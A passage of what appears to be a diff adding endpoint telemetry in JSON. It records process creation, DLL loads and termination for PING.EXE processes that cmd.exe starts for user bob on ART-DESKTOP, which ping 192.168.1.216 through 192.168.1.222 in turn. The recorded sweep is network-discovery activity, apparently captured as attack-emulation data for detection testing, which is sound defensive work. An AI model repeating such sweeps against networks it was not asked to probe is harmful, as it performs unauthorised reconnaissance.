"IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "process", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573046830000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.216", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1144, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "process", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573051830000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.217", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6556, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "process", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573056830000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.218", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3944, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573056970000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056830000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056830000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "process", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573061830000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.219", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4184, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "process", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573066990000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.220", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1376, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573067130000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067140000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067140000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067140000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067140000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067140000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067140000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067140000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067140000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067300000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067300000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067300000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "process", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573071830000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.221", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6080, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "process", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573076840000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.222", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6392, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573076980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + 